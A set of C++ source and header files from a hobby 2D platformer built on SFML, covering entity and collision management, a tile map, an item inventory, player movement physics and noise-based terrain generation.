class EventManager;
class CollisionManager;
class EntityManager;
class ItemManager;
class Camera;
namespace sf {
class RenderWindow;
}
class GameStatePlaying: public GameState {
public:
GameStatePlaying(sf::RenderWindow* window, EventManager* eventManager);
~GameStatePlaying();
void setup() override;
std::vector<int> readMap(const char* file);
void update(sf::Clock& clock) override;
void render() override;
void observe(const sf::Event& _event) override;
void handleEvents() override;
private:
EventManager* mEventManager;
CollisionManager* mCollisionManager;
ItemManager* mItemManager;
EntityManager* mEntityManager;
sf::RenderWindow* mWindow;
Camera* mCamera;
unsigned mMapHeight;
unsigned mMapWidth;
bool mPaused;
};
#endif // !_INCLUDED_GAMESTATEPLAYING_H_
<file_sep>#ifndef _INCLUDED_COLLISIONMANAGER_H_
#define _INCLUDED_COLLISIONMANAGER_H_
#include "CollidableEntity.h"
#include <vector>
namespace sf {
class RenderWindow;
}
class Item;
class TileMap;
class CollisionManager {
public:
typedef std::vector<CollidableEntity*> CollidableVector;
CollisionManager(sf::RenderWindow* window);
~CollisionManager();
void addDynamicCollidable(CollidableEntity* collidable);
void addItemCollidable(CollidableEntity* collidable);
void addTileMap(TileMap* tileMap);
const CollidableVector& getDynamicCollidables() const;
//TileMap& getTileMap();
void detectCollisions();
void removeDeadCollidables();
void clearVector();
void narrowCollision(std::pair<CollidableEntity*, CollidableEntity*>& colliding);
private:
sf::RenderWindow* mWindow;
CollidableVector mDynamicCollidables;
CollidableVector mItems;
TileMap* mTileMap;
};
#endif // !_INCLUDED_COLLISIONMANAGER_H_
<file_sep>#include "EntityManager.h"
#include "Entity.h"
#include "ItemManager.h"
#include <map>
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/System/Time.hpp>
#include <SFML/Graphics/View.hpp>
EntityManager::EntityManager() :
mEntities() {
}
EntityManager::~EntityManager() {
internalCleanup();
}
void EntityManager::addEntity(Entity* entity) {
mEntities.push_back(entity);
}
void EntityManager::updateEntities(const sf::Time& deltaTime) {
std::vector<Entity*> temp(mEntities);
for (auto it : temp) {
it->tick(deltaTime);
}
}
void EntityManager::renderElements(sf::RenderWindow & window) {
std::map<int, std::vector<Entity*>> mappy;
for (auto e : mEntities) {
mappy[e->getRenderLayer()].push_back(e);
}
sf::View prevView = window.getView();
sf::View GUIView = sf::View(sf::FloatRect(0, 0, (float)window.getSize().x, (float)window.getSize().y));
bool drawGUI = false;
for (auto it : mappy) {
if (drawGUI || it.first >= 100) {
if (drawGUI == false)
window.setView(GUIView);
drawGUI = true;
for (auto itt : it.second) {
window.draw(*itt);
}
}
else {
for (auto itt : it.second) {
window.draw(*itt);
}
}
}
window.setView(prevView);
}
void EntityManager::garbageCollection() {
std::vector<Entity*> temp;
for (auto e : mEntities) {
if (e->garbage())
delete e;
else
temp.push_back(e);
}
mEntities = temp;
}
void EntityManager::internalCleanup() {
while (!mEntities.empty()) {
delete mEntities.back();
mEntities.pop_back();
}
}
<file_sep>#ifndef _INCLUDED_COLLIDABLEENTITYDEFAULT_H_
#define _INCLUDED_COLLIDABLEENTITYDEFAULT_H_
#include "CollidableEntity.h"
#include <SFML/Graphics/RectangleShape.hpp>
class CollidableEntityDefault : public CollidableEntity {
public:
CollidableEntityDefault(EntityType entityType);
~CollidableEntityDefault();
virtual void tick(const sf::Time & deltaTime) = 0;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
virtual void setSprite(sf::Vector2f size);
virtual void setSprite(float width, float height);
virtual CollideCategory getCategory() const override;
virtual std::vector<sf::Vector2f> getAxes() const override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) = 0;
virtual sf::FloatRect getHitbox() const override;
virtual sf::Shape * getNarrowHitbox() const override;
protected:
virtual void updateAxes();
bool mGarbage;
sf::RectangleShape mSprite;
sf::Shape* mHitboxShape;
CollideCategory mCat;
std::vector<sf::Vector2f> mAxes;
};
#endif // !_INCLUDED_COLLIDABLEENTITYDEFAULT_H_
<file_sep>#include "TileMap.h"
#include "CollisionManager.h"
#include "ResourceManager.h"
#include "Wall.h"
#include "Constants.h"
#include <SFML/Graphics/RenderWindow.hpp>
TileMap::TileMap(CollisionManager* collisionManager) :
Entity(WALL),
mCollisionManager(collisionManager) {
}
TileMap::~TileMap() {
}
void TileMap::removeVertices(int vertex) {
size_t count = mVertices.getVertexCount();
for (size_t i = 0; i < 4; i++) {
mVertices[vertex + i] = mVertices[count - 4 + i];
}
/*for (auto t : mTileCollisions) {
int vert = t->getVertex();
if (vert == count - 4) {
t->setVertex(vertex);
break;
}
}*/
mVertices.resize(count - 4);
}
bool TileMap::load(const char* tileset, sf::Vector2u tileSize, int* tiles, unsigned width, unsigned height) {
if (tileset != nullptr)
mTileset = &ResourceManager::getInstance().getTexture(tileset);
else
return false;
mTileSize = tileSize;
mTiles = tiles;
mVertices.setPrimitiveType(sf::Quads);
mVertices.resize(width * height * 4);
for (unsigned i = 0; i < width; i++) {
for (unsigned j = 0; j < height; j++) {
int tileNumber = mTiles[i + j * width];
if (tileNumber == -1)
continue;
int tu = tileNumber % (mTileset->getSize().x / mTileSize.x);
int tv = tileNumber / (mTileset->getSize().x / mTileSize.x);
int pos = (i + j * width) * 4;
int pos2 = pos / 4;
int pos3 = pos2 - Constants::Map::Width;
sf::Vertex* quad = &mVertices[pos];
quad[0].position = sf::Vector2f((float)(i * mTileSize.x), (float)(j * mTileSize.y));
quad[1].position = sf::Vector2f((float)((i + 1) * mTileSize.x), (float)(j * mTileSize.y));
quad[2].position = sf::Vector2f((float)((i + 1) * mTileSize.x), (float)((j + 1) * mTileSize.y));
quad[3].position = sf::Vector2f((float)(i * mTileSize.x), (float)((j + 1) * mTileSize.y));
quad[0].texCoords = sf::Vector2f((float)(tu * mTileSize.x), (float)(tv * mTileSize.y));
quad[1].texCoords = sf::Vector2f((float)((tu + 1) * mTileSize.x), (float)(tv * mTileSize.y));
quad[2].texCoords = sf::Vector2f((float)((tu + 1) * mTileSize.x), (float)((tv + 1) * mTileSize.y));
quad[3].texCoords = sf::Vector2f((float)(tu * mTileSize.x), (float)((tv + 1) * mTileSize.y));
Wall* wall = new Wall(this, pos, pos2);
wall->setSprite((float)tileSize.x, (float)tileSize.y);
wall->setPosition(quad[0].position);
mWallHashTable[pos2] = wall;
if (pos3 > 0 && mWallHashTable[pos3] == nullptr) {
wall->setCollisionCat(CollidableEntity::CollideCategory::FLOOR);
}
}
}
return true;
}
CollidableEntity** TileMap::getWallHashTable()
{
return mWallHashTable;
}
void TileMap::tick(const sf::Time & deltaTime) {
}
void TileMap::draw(sf::RenderTarget & target, sf::RenderStates states) const {
states.transform *= getTransform();
states.texture = mTileset;
target.draw(mVertices, states);
}
bool TileMap::garbage() const {
return false;
}
void TileMap::kill() {
}
<file_sep>#ifndef _INCLUDED_ENTITYMANAGER_H_
#define _INCLUDED_ENTITYMANAGER_H_
#include <vector>
class Entity;
namespace sf {
class Time;
class RenderWindow;
}
class EntityManager {
public:
EntityManager();
virtual ~EntityManager();
// Higher layers are drawn later, and layer >= 100 will be drawn statically
void addEntity(Entity* entity);
void updateEntities(const sf::Time& deltaTime);
void renderElements(sf::RenderWindow& window);
void garbageCollection();
private:
void internalCleanup();
std::vector<Entity*> mEntities;
};
#endif // !_INCLUDED_ENTITYMANAGER_H_
<file_sep>#ifndef _INCLUDED_VECTORMATH_H_
#define _INCLUDED_VECTORMATH_H_
#include <SFML/System/Vector2.hpp>
struct VectorMath{
VectorMath() = delete;
~VectorMath() = delete;
VectorMath& operator=(const VectorMath&) = delete;
VectorMath(const VectorMath&) = delete;
static float dotProduct(const sf::Vector2f& a, const sf::Vector2f& b);
static float getVectorLength(const sf::Vector2f& vector);
static float getVectorLengthSq(const sf::Vector2f& vector);
static sf::Vector2f normalizeVector(const sf::Vector2f& vector);
static float getAngle(const sf::Vector2f& v1, const sf::Vector2f& v2);
static sf::Vector2f rotateVector(const sf::Vector2f& vector, const float& degrees);
static sf::Vector2f getNormal(const sf::Vector2f& aVector);
static sf::Vector2f projectVector(const sf::Vector2f& aVector, const sf::Vector2f& aProjectOn);
};
#endif // !_INCLUDED_VECTORMATH_H_
<file_sep>#include "GameStatePlaying.h"
#include "EventManager.h"
#include "Player.h"
#include "Inventory.h"
#include "Item.h"
#include "TileMap.h"
#include "MouseCursor.h"
#include "Backdrop.h"
#include "MapGenerator.h"
#include "Camera.h"
#include "Constants.h"
#include "ItemDatabase.h"
#include "ItemManager.h"
#include "EntityManager.h"
#include "CollisionManager.h"
#include <SFML/Graphics/RenderWindow.hpp>
static const char* TILESET = "Resources/Images/Tiles.png";
static const char* BACKGROUND = "Resources/Images/Backdrop.png";
static const char* MAP = "Resources/Images/Map.png";
GameStatePlaying::GameStatePlaying(sf::RenderWindow* window, EventManager* eventManager) :
mWindow(window), mEventManager(eventManager), mPaused(false),
mEntityManager(new EntityManager()) {
mCollisionManager = new CollisionManager(window);
mItemManager = new ItemManager(mEventManager);
mEventManager->registerObserver(this, sf::Event::EventType::KeyPressed);
}
GameStatePlaying::~GameStatePlaying() {
mEventManager->unregisterObserver(this, sf::Event::EventType::KeyPressed);
delete mEntityManager;
}
std::vector<int> GameStatePlaying::readMap(const char* file) {
std::vector<int> vec;
sf::Image mapImage;
if (!mapImage.loadFromFile(file))
return vec;
mMapWidth = mapImage.getSize().x;
mMapHeight = mapImage.getSize().y;
const sf::Uint8* pixelArray = mapImage.getPixelsPtr();
const std::size_t arraySize = mMapHeight * mMapWidth * 4;
for (std::size_t i = 0; i < arraySize; i += 4) {
sf::Color pixel = { *(pixelArray + i), *(pixelArray + i + 1), *(pixelArray + i + 2), *(pixelArray + i + 3) };
if (pixel == sf::Color(0, 0, 0))
vec.push_back(-1);
else if (pixel == sf::Color(127, 0, 127))
vec.push_back(0);
else if (pixel == sf::Color(0, 255, 0))
vec.push_back(1);
else if (pixel == sf::Color(76, 76, 76))
vec.push_back(10);
}
return vec;
}
void GameStatePlaying::setup() {
MouseCursor* cursor = new MouseCursor();
cursor->setRenderLayer(500);
mEntityManager->addEntity(cursor);
mCollisionManager->addDynamicCollidable(cursor);
Player* player = new Player(mWindow, mEntityManager);
player->setRenderLayer(50);
mEntityManager->addEntity(player);
mCollisionManager->addDynamicCollidable(player);
//std::vector<int> level = readMap(MAP);
Inventory* inventory = new Inventory(mEventManager, mEntityManager);
inventory->setRenderLayer(105);
inventory->setupInventory(8, 8);
mEntityManager->addEntity(inventory);
// Item Test
Item* item = new Item(ItemDatabase::getInstance().getItemInfoByName("Testobject")->ID, 450);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
item = new Item(ItemDatabase::getInstance().getItemInfoByName("Chest")->ID, 1);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
item = new Item(ItemDatabase::getInstance().getItemInfoByName("Book")->ID, 2);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
// End item test
cursor->initalize(mEventManager, mWindow);
player->setCursor(cursor);
mItemManager->initialize(cursor, inventory);
mMapHeight = Constants::Map::Height;
mMapWidth = Constants::Map::Width;
int levelAlso[Constants::Map::Width * Constants::Map::Height];
MapGenerator::generateMap(levelAlso, mMapWidth, mMapHeight);
TileMap* tileMap = new TileMap(mCollisionManager);
if (!tileMap->load(TILESET, sf::Vector2u(32, 32), &levelAlso[0], mMapWidth, mMapHeight))
return;
tileMap->setRenderLayer(2);
mEntityManager->addEntity(tileMap);
mCollisionManager->addTileMap(tileMap);
/*Backdrop* backdrop = new Backdrop();
backdrop->load(BACKGROUND);
mEntityManager->addEntity(backdrop, 110);*/
sf::Vector2f size = sf::Vector2f((float)mMapWidth*Constants::Block::Width,
(float)mMapHeight*Constants::Block::Width);
mCamera = new Camera(mWindow);
mCamera->setup(player, size);
ItemDatabase &itemDatabase = ItemDatabase::getInstance();
}
void GameStatePlaying::update(sf::Clock& clock) {
sf::Time time = clock.restart();
if (!mPaused) {
mEntityManager->updateEntities(time);
mCollisionManager->detectCollisions();
//Camera has to update after collision in order not to stutter
mCamera->tick(time);
mCollisionManager->removeDeadCollidables();
mEntityManager->garbageCollection();
}
}
void GameStatePlaying::render() {
mEntityManager->renderElements(*mWindow);
}
void GameStatePlaying::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::P) {
mPaused = !mPaused;
}
default:
break;
}
}
void GameStatePlaying::handleEvents() {
sf::Event currEvent;
while (mWindow->pollEvent(currEvent)) {
mEventManager->notify(currEvent);
}
}
<file_sep>#pragma once
#include "EventObserver.h"
class EventManager;
class MouseCursor;
class Inventory;
class Item;
class ItemManager : public EventObserver {
public:
ItemManager(EventManager* eventManager);
~ItemManager();
bool initialize(MouseCursor* cursor, Inventory* inventory);
virtual void observe(const sf::Event& _event) override;
private:
MouseCursor* mCursor;
Inventory* mInventory;
EventManager* mEventManager;
Item* mCursorItem;
};<file_sep>#include "Backdrop.h"
#include <SFML/Graphics/RenderWindow.hpp>
Backdrop::Backdrop() :
Entity(UNUSED),
mSprite(), mTexture() {
}
Backdrop::~Backdrop() {
}
bool Backdrop::load(const char* file) {
if (!mTexture.loadFromFile(file))
return false;
mSprite.setTexture(mTexture);
return true;
}
void Backdrop::tick(const sf::Time & deltaTime) {
}
void Backdrop::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
bool Backdrop::garbage() const {
return false;
}
void Backdrop::kill() {
}
<file_sep>#ifndef _INCLUDED_ENTITY_H_
#define _INCLUDED_ENTITY_H_
#include <SFML/Graphics/Drawable.hpp>
#include <SFML/Graphics/Transformable.hpp>
namespace sf {
class Time;
}
class Entity : public sf::Drawable, public sf::Transformable {
public:
enum EntityType {
PLAYER,
ENEMY,
ITEM,
INVENTORYSLOT,
WALL,
UNUSED
};
Entity(EntityType entityType);
virtual ~Entity();
virtual void tick(const sf::Time& deltaTime) = 0;
virtual void draw(sf::RenderTarget& target, sf::RenderStates states) const = 0;
virtual bool garbage() const = 0;
virtual void kill() = 0;
virtual int getRenderLayer() const { return mRenderLayer; }
virtual void setRenderLayer(int layer) { mRenderLayer = layer; }
EntityType getEntityType() const { return mEntityType; }
protected:
int mRenderLayer;
const EntityType mEntityType;
};
#endif // !_INCLUDED_ENTITY_H_
<file_sep>#pragma once
#include "CollidableEntityDefault.h"
#include "ItemDatabase.h"
#include <SFML/Graphics/Sprite.hpp>
#include <SFML/Graphics/Text.hpp>
class InventorySlot;
class Item : public CollidableEntityDefault {
public:
Item(int itemID);
Item(int itemID, int stackSize);
~Item();
virtual void tick(const sf::Time& deltaTime) override;
virtual void draw(sf::RenderTarget& target, sf::RenderStates states) const override;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) override;
virtual void setRenderLayer(int layer) override;
virtual int getRenderLayer() const override;
ItemDatabase::ItemStruct* getItemInfo();
void anchorToEntity(Entity* entity);
Entity* getAnchor() const;
int getStackSize() const;
void addToStack(int size);
void setMaxStack();
void setDrawMe(bool toDraw);
int getInventorySlot() const;
void setInventorySlot(int slot);
private:
void setShitUp();
Entity* mAnchor;
sf::Sprite mSprite;
sf::Text mStackText;
sf::Vector2f mVelocity;
ItemDatabase::ItemStruct* mItemInfo;
bool mDrawMe;
int mStackSize;
int minventorySlot;
};<file_sep>#include "Item.h"
#include "Constants.h"
#include "ResourceManager.h"
#include "InventorySlot.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include<SFML/System/Time.hpp>
Item::Item(int itemID) :
Item(itemID, 1) {
}
Item::Item(int itemID, int stackSize) :
CollidableEntityDefault(EntityType::ITEM),
mVelocity(0.0f, 0.0f),
mStackSize(stackSize),
minventorySlot(-1),
mStackText("", ResourceManager::getInstance().getFont(Constants::Files::Default_Font)),
mItemInfo(ItemDatabase::getInstance().getItemInfo(itemID)) {
setShitUp();
}
void Item::setShitUp() {
mSprite.setTexture(ResourceManager::getInstance().getTexture(mItemInfo->imageFilename));
mSprite.setTextureRect(sf::IntRect(0, 0, 32 * mItemInfo->width, 32 * mItemInfo->height));
mStackText.setString(std::to_string(mStackSize));
mStackText.setOutlineThickness(1.0f);
mStackText.setOutlineColor(sf::Color::Black);
mStackText.setFillColor(sf::Color::White);
mStackText.setCharacterSize(12);
}
Item::~Item() {
}
void Item::tick(const sf::Time& deltaTime) {
if (mAnchor != nullptr) return;
mVelocity.y += Constants::Physics::Gravity*deltaTime.asSeconds();
mVelocity.y = std::min(mVelocity.y, Constants::Physics::TerminalVelocity.y);
mVelocity.y = std::max(mVelocity.y, -Constants::Physics::TerminalVelocity.y);
move(mVelocity);
}
void Item::draw(sf::RenderTarget& target, sf::RenderStates states) const {
if (!mDrawMe) return;
if (mAnchor != nullptr)
states.transform *= mAnchor->getTransform();
else
states.transform *= getTransform();
target.draw(mSprite, states);
if (mItemInfo->maxStack > 1)
target.draw(mStackText, states);
}
void Item::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (collidable->getCategory() == CollideCategory::WALL) {
mVelocity.x = 0.0f;
move(moveAway);
}
else if (collidable->getCategory() == CollideCategory::FLOOR) {
mVelocity.y = 0.0f;
move(moveAway);
}
}
void Item::setRenderLayer(int layer) {
mRenderLayer = layer;
}
int Item::getRenderLayer() const {
return (mAnchor != nullptr ? std::min(mAnchor->getRenderLayer() + 1, 200) : mRenderLayer);
}
ItemDatabase::ItemStruct* Item::getItemInfo() {
return mItemInfo;
}
void Item::anchorToEntity(Entity* entity) {
mAnchor = entity;
if (entity->getEntityType() == EntityType::INVENTORYSLOT) {
InventorySlot* invSlot = dynamic_cast<InventorySlot*>(entity);
minventorySlot = invSlot->getIndex();
}
else
minventorySlot = -1;
}
Entity* Item::getAnchor() const {
return mAnchor;
}
int Item::getStackSize() const {
return mStackSize;
}
void Item::addToStack(int size) {
mStackSize = std::max(mStackSize += size, 1);
mStackText.setString(std::to_string(mStackSize));
}
void Item::setMaxStack() {
mStackSize = mItemInfo->maxStack;
mStackText.setString(std::to_string(mStackSize));
}
void Item::setDrawMe(bool toDraw) {
mDrawMe = toDraw;
}
int Item::getInventorySlot() const {
return minventorySlot;
}
void Item::setInventorySlot(int slot) {
minventorySlot = slot;
}
<file_sep>#ifndef _INCLUDED_TILEMAP_H_
#define _INCLUDED_TILEMAP_H_
#include <SFML/Graphics/VertexArray.hpp>
#include <SFML/Graphics/Texture.hpp>
#include "Entity.h"
class CollisionManager;
class CollidableEntity;
class Wall;
class TileMap : public Entity {
public:
TileMap(CollisionManager* collisionManager);
~TileMap();
void removeVertices(int vertex);
bool load(const char* tileset, sf::Vector2u tileSize,int* tiles, unsigned width, unsigned height);
CollidableEntity** getWallHashTable();
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
CollisionManager* mCollisionManager;
//static const int WIDTH, HEIGHT;
sf::VertexArray mVertices;
sf::Texture* mTileset;
sf::Vector2u mTileSize;
int* mTiles;
CollidableEntity* mWallHashTable[512*128];
};
#endif // !_INCLUDED_TILEMAP_H_
<file_sep>#include "CollidableEntityDefault.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include "VectorMath.h"
CollidableEntityDefault::CollidableEntityDefault(EntityType entityType) :
mGarbage(false), mSprite(sf::Vector2f(32, 32)),
CollidableEntity(entityType) {
mHitboxShape = new sf::RectangleShape(mSprite);
// Remove later
//mSprite.setOutlineThickness(5.0f);
mSprite.setFillColor(sf::Color::Red);
mSprite.setOutlineColor(sf::Color::Magenta);
// Remove to here
updateAxes();
}
CollidableEntityDefault::~CollidableEntityDefault() {
delete mHitboxShape;
}
void CollidableEntityDefault::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
bool CollidableEntityDefault::garbage() const {
return mGarbage;
}
void CollidableEntityDefault::kill() {
mGarbage = true;
}
void CollidableEntityDefault::setSprite(sf::Vector2f size) {
mSprite = sf::RectangleShape(size);
delete mHitboxShape;
mHitboxShape = new sf::RectangleShape(mSprite);
updateAxes();
}
void CollidableEntityDefault::setSprite(float width, float height) {
mSprite = sf::RectangleShape({ width, height });
delete mHitboxShape;
mHitboxShape = new sf::RectangleShape(mSprite);
updateAxes();
}
CollidableEntity::CollideCategory CollidableEntityDefault::getCategory() const {
return mCat;
}
std::vector<sf::Vector2f> CollidableEntityDefault::getAxes() const {
return mAxes;
}
sf::FloatRect CollidableEntityDefault::getHitbox() const {
//Might return fuckd up results
return getTransform().transformRect(mSprite.getGlobalBounds());
}
sf::Shape* CollidableEntityDefault::getNarrowHitbox() const {
if (mHitboxShape != nullptr) {
mHitboxShape->setPosition(getPosition());
mHitboxShape->setScale(getScale());
mHitboxShape->setRotation(getRotation());
return mHitboxShape;
}
return nullptr;
}
void CollidableEntityDefault::updateAxes() {
mAxes.clear();
std::size_t pointCount = mHitboxShape->getPointCount();
for (std::size_t i = 0; i < pointCount; i++) {
sf::Transform trans = mHitboxShape->getTransform();
sf::Vector2f v1 = mHitboxShape->getPoint(i + 1 == pointCount ? 0 : i + 1);
sf::Vector2f v2 = mHitboxShape->getPoint(i);
v1 = trans.transformPoint(v1);
v2 = trans.transformPoint(v2);
mAxes.push_back(VectorMath::normalizeVector(VectorMath::getNormal(v2 - v1)));
}
}
<file_sep>#ifndef _INCLUDED_WALL_H_
#define _INCLUDED_WALL_H_
#include "CollidableEntityDefault.h"
class TileMap;
class Wall : public CollidableEntityDefault{
public:
Wall(TileMap* tileMap, int quadVertices, int arrayPos);
~Wall();
int getVertex() const;
void setVertex(int num);
void setCollisionCat(CollideCategory cat);
virtual void tick(const sf::Time& deltaTime) override;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) override;
private:
TileMap* mTileMap;
int mArrayPos;
int mQuadVertices;
};
#endif // !_INCLUDED_WALL_H_
<file_sep>#ifndef _INCLUDED_MAPGENERATOR_H_
#define _INCLUDED_MAPGENERATOR_H_
class MapGenerator {
public:
static void generateMap(int* arr, int width, int height);
private:
};
#endif // !_INCLUDED_MAPGENERATOR_H_
<file_sep>#include "Wall.h"
#include "TileMap.h"
#include "Constants.h"
#include <SFML/Window/Keyboard.hpp>
Wall::Wall(TileMap* tileMap, int quadVertices, int arrayPos) :
CollidableEntityDefault(EntityType::WALL),
mTileMap(tileMap), mArrayPos(arrayPos) {
mCat = CollideCategory::WALL;
mQuadVertices = quadVertices;
}
Wall::~Wall() {
mTileMap->removeVertices(mQuadVertices);
}
int Wall::getVertex() const {
return mQuadVertices;
}
void Wall::setVertex(int num) {
mQuadVertices = num;
}
void Wall::setCollisionCat(CollideCategory cat) {
mCat = cat;
}
void Wall::tick(const sf::Time& deltaTime) {
}
void Wall::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (sf::Keyboard::isKeyPressed(sf::Keyboard::E)) {
mGarbage = true;
for (int i = 0; i < 4; i++) {
}
}
}
<file_sep>#ifndef _INCLUDED_GAMEMANAGER_H_
#define _INCLUDED_GAMEMANAGER_H_
#include "EventObserver.h"
#include <SFML/System/Clock.hpp>
namespace sf {
class RenderWindow;
}
class GameState;
class EventManager;
class GameManager : public EventObserver{
public:
GameManager();
~GameManager();
void run();
virtual void observe(const sf::Event& _event) override;
private:
bool initalizeGame();
bool initalizeWindow();
void close();
void gameLoop();
sf::Clock mClock;
sf::RenderWindow* mWindow;
GameState* mGameState;
EventManager* mEventManager;
};
#endif // !_INCLUDED_GAMEMANAGER_H_<file_sep>//#include "Constants.h"
//
//namespace Constants {
// namespace Block {
// const int Height = 32;
// const int Width = 32;
// }
// namespace Map {
// const int Width = 512;
// const int Height = 128;
// }
// namespace Physics {
// const float Gravity = 5.0f;
// const float ImpactBounce = 0.33f;
// const sf::Vector2f TerminalVelocity = { 3.0f, 4.0f };
// }
//}<file_sep>#include "Entity.h"
Entity::Entity(EntityType entityType) :
mEntityType(entityType) {
}
Entity::~Entity() {
}
<file_sep>#include "Player.h"
#include "VectorMath.h"
#include "MouseCursor.h"
#include "Constants.h"
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/Window/Keyboard.hpp>
#include <SFML/System/Clock.hpp>
static const float SPEED = 125.0f;
static const float ACCELLERATION = 2.7f;
static const float JUMP_SPEED = 3.5f;
Player::Player(sf::RenderWindow* window, EntityManager* entityManager) :
CollidableEntityDefault(EntityType::PLAYER),
mWindow(window), mEntityManager(entityManager),
mCanJump(false), mFriction(4.0) {
mSprite.setFillColor(sf::Color::Blue);
mSprite.setOutlineThickness(0.0f);
setSprite(25.0f, 50.0f);
setPosition((float)mWindow->getSize().x / 2, -100.0f);
mCat = CollideCategory::PLAYER;
}
Player::~Player() {
}
void Player::setCursor(MouseCursor* cursor) {
mCursor = cursor;
}
void Player::tick(const sf::Time& deltaTime) {
//Shitty lag solution
if (deltaTime.asSeconds() >= 0.25f)
return;
// Calculate movement
mVelocity.y = mVelocity.y + Constants::Physics::Gravity * deltaTime.asSeconds();
mVelocity.y = std::max(mVelocity.y, -Constants::Physics::TerminalVelocity.y);
mVelocity.y = std::min(mVelocity.y, Constants::Physics::TerminalVelocity.y);
if (sf::Keyboard::isKeyPressed(sf::Keyboard::A)) {
mVelocity.x = mVelocity.x - ACCELLERATION * deltaTime.asSeconds();
mVelocity.x = std::max(mVelocity.x, -Constants::Physics::TerminalVelocity.x);
}
else if (sf::Keyboard::isKeyPressed(sf::Keyboard::D)) {
mVelocity.x = mVelocity.x + ACCELLERATION * deltaTime.asSeconds();
mVelocity.x = std::min(mVelocity.x, Constants::Physics::TerminalVelocity.x);
}
else if (mCanJump) {
mVelocity.y = 0.0f;
if (mVelocity.x < 0) {
mVelocity.x = mVelocity.x + mFriction * deltaTime.asSeconds();
mVelocity.x = std::min(mVelocity.x, 0.0f);
}
else if (mVelocity.x > 0) {
mVelocity.x = mVelocity.x - mFriction * deltaTime.asSeconds();
mVelocity.x = std::max(mVelocity.x, 0.0f);
}
}
if (mCanJump && sf::Keyboard::isKeyPressed(sf::Keyboard::Space)) {
mCanJump = false;
mVelocity.y = -JUMP_SPEED;
}
move(mVelocity * deltaTime.asSeconds() * SPEED);
mCanJump = false;
}
void Player::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (collidable->getCategory() == CollidableEntity::CollideCategory::WALL) {
if (abs(moveAway.x) > abs(moveAway.y)) {
mVelocity.x = 0.0f;
}
else {
mVelocity.y = -mVelocity.y*Constants::Physics::ImpactBounce;
}
move(moveAway);
}
else if (collidable->getCategory() == CollidableEntity::CollideCategory::FLOOR) {
if (abs(moveAway.x) < abs(moveAway.y)) {
if (moveAway.y < 0.0f) {
mCanJump = true;
mVelocity.y = 0.0f;
}
else {
mVelocity.y = -mVelocity.y*Constants::Physics::ImpactBounce;
}
}
move(moveAway);
}
}
<file_sep>#pragma once
#include "Entity.h"
#include <SFML/Graphics/Sprite.hpp>
class Item;
class InventorySlot : public Entity {
public:
InventorySlot(int index);
~InventorySlot();
void setTexture(const char* filename);
Item* getContent();
void setContent(Item* item);
void setIndex(int index);
int getIndex() const;
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
sf::Sprite mBackground;
Item* mContent;
int mIndex;
int mRenderLayer;
bool mGarbage;
};<file_sep>#ifndef _INCLUDED_BACKDROP_H_
#define _INCLUDED_BACKDROP_H_
#include "Entity.h"
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/Sprite.hpp>
class Backdrop : public Entity {
public:
Backdrop();
~Backdrop();
bool load(const char* file);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
sf::Sprite mSprite;
sf::Texture mTexture;
};
#endif // !_INCLUDED_BACKDROP_H_
<file_sep>#ifndef _INCLUDED_PLAYER_H_
#define _INCLUDED_PLAYER_H_
#include "CollidableEntityDefault.h"
#include <vector>
class MouseCursor;
class EntityManager;
namespace sf {
class RenderWindow;
}
class Player : public CollidableEntityDefault{
public:
Player(sf::RenderWindow* window, EntityManager* entityManager);
~Player();
void setCursor(MouseCursor* cursor);
virtual void tick(const sf::Time & deltaTime) override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) override;
private:
EntityManager* mEntityManager;
sf::RenderWindow* mWindow;
MouseCursor* mCursor;
sf::Vector2f mVelocity;
float mFriction;
bool mCanJump;
};
#endif // !_INCLUDED_PLAYER_H_
<file_sep>#include "MapGenerator.h"
#include "simplexnoise.h"
#include <cmath>
#include <vector>
#include <SFML/System/Vector2.hpp>
float noise(float nx, float ny) {
return (raw_noise_2d(nx, ny) + 1.0f) / 2.0f;
}
float fBm(float x, float y, int octaves, float lacunarity, float gain) {
float amp = 1;
sf::Vector2f vec(x, y);
float sum = 0;
for (int i = 0; i < octaves; i++) {
sum += amp * raw_noise_2d(vec.x, vec.y);
amp *= gain;
vec *= lacunarity;
}
return sum;
}
float RidgedMultifractal(float x, float y, int octaves, float lacunarity, float gain, float H, float sharpness, float threshold) {
float result, signal, weight, exponent;
sf::Vector2f vec(x, y);
for (int i = 0; i < octaves; i++) {
if (i == 0) {
signal = raw_noise_2d(vec.x, vec.y);
if (signal <= 0.0)
signal = -signal;
signal = gain - signal;
signal = pow(signal, sharpness);
result = signal;
weight = 1.0f;
}
else {
exponent = pow(lacunarity, -i*H);
vec *= lacunarity;
weight = signal * threshold;
weight = std::fminf(std::fmaxf(weight, 0.0f), 1.0f);
signal = raw_noise_2d(vec.x, vec.y);
signal = abs(signal);
signal *= weight;
result += signal * exponent;
}
}
return result;
}
